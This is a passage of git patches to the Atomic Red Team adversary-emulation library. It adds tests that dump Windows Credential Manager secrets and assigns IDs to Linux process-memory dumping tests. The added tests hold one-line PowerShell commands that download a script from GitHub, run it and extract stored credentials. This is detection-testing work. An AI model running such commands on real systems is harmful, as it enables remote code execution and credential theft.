a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 958c5b89..0eda063b 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -11,6 +11,8 @@ credential-access,T1552.001,Credentials In Files,3,Extracting passwords with fin credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell +credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell +credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 4835de52..cbe6e63b 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -3,6 +3,8 @@ credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell +credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell +credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index c55b55ee..f6da33e1 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -24,6 +24,8 @@ - Atomic Test #5: Find and Access Github Credentials [macos, linux] - [T1555 Credentials from Password Stores](../../T1555/T1555.md) - Atomic Test #1: Extract Windows Credential Manager via VBA [windows] + - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows] + - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows] - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md) - Atomic Test #1: Run Chrome-password Collector [windows] - Atomic Test #2: Search macOS Safari Cookies [macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index eeb67747..7bc31d02 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -12,6 +12,8 @@ - Atomic Test #4: Access unattend.xml [windows] - [T1555 Credentials from Password Stores](../../T1555/T1555.md) - Atomic Test #1: Extract Windows Credential Manager via VBA [windows] + - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows] + - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows] - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md) - Atomic Test #1: Run Chrome-password Collector [windows] - Atomic Test #3: LaZagne - Credentials from Browser [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4ebeaa43..686e91a6 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -1055,6 +1055,32 @@ credential-access: ' name: powershell + - name: Dump credentials from Windows Credential Manager With PowerShell [windows + Credentials] + auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3 + description: This module will extract the credentials from Windows Credential + Manager + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' + -UseBasicParsing); Get-PasswordVaultCredentials -Force \n" + - name: Dump credentials from Windows Credential Manager With PowerShell [web + Credentials] + auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240 + description: This module will extract the credentials from Windows Credential + Manager + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'' + -UseBasicParsing); Get-CredManCreds -Force + +' T1555.003: technique: created: '2020-02-12T18:57:36.041Z' diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md index c08e2e0b..76606bc1 100644 --- a/atomics/T1555/T1555.md +++ b/atomics/T1555/T1555.md @@ -6,6 +6,10 @@ - [Atomic Test #1 - Extract Windows Credential Manager via VBA](#atomic-test-1---extract-windows-credential-manager-via-vba) +- [Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]](#atomic-test-2---dump-credentials-from-windows-credential-manager-with-powershell-windows-credentials) + +- [Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]](#atomic-test-3---dump-credentials-from-windows-credential-manager-with-powershell-web-credentials) +
@@ -53,4 +57,52 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir +
+
+ +## Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] +This module will extract the credentials from Windows Credential Manager + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force +``` + + + + + + +
+
+ +## Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials] +This module will extract the credentials from Windows Credential Manager + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force +``` + + + + + +
From acb9c9d55e22ec12387fefd33eee14475a825a3a Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 11 Jun 2021 19:40:02 +0000 Subject: [PATCH 29/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.007/T1003.007.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml index d6e49b4a..fbadc564 100644 --- a/atomics/T1003.007/T1003.007.yaml +++ b/atomics/T1003.007/T1003.007.yaml @@ -3,6 +3,7 @@ attack_technique: T1003.007 display_name: 'OS Credential Dumping: Proc Filesystem' atomic_tests: - name: Dump individual process memory with sh (Local) + auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80 description: | Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. @@ -50,6 +51,7 @@ atomic_tests: rm -f "#{output_file}" - name: Dump individual process memory with Python (Local) + auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 description: | Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to copy a process's heap memory to an external file so it can be searched or exfiltrated later. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index e3e4f0c6..55f9ed27 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -714,3 +714,5 @@ c35ac4a8-19de-43af-b9f8-755da7e89c89 42f22b00-0242-4afc-a61b-0da05041f9cc c89becbe-1758-4e7d-a0f4-97d2188a23e3 8fd5a296-6772-4766-9991-ff4e92af7240 +7e91138a-8e74-456d-a007-973d67a0bb80 +437b2003-a20d-4ed8-834c-4964f24eec63 From 0c19189bf84feff4ccde122403d7f5454b867f9e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 11 Jun 2021 19:40:11 +0000 Subject: [PATCH 30/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/linux-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 4 +- .../Indexes/Indexes-Markdown/linux-index.md | 4 +- atomics/Indexes/Matrices/linux-matrix.md | 2 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/index.yaml | 101 ++++++++++++- atomics/T1003.007/T1003.007.md | 134 ++++++++++++++++++ 10 files changed, 248 insertions(+), 7 deletions(-) create mode 100644 atomics/T1003.007/T1003.007.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index fbe9e18a..836c4f9a 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 08f59b92..21e118de 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqu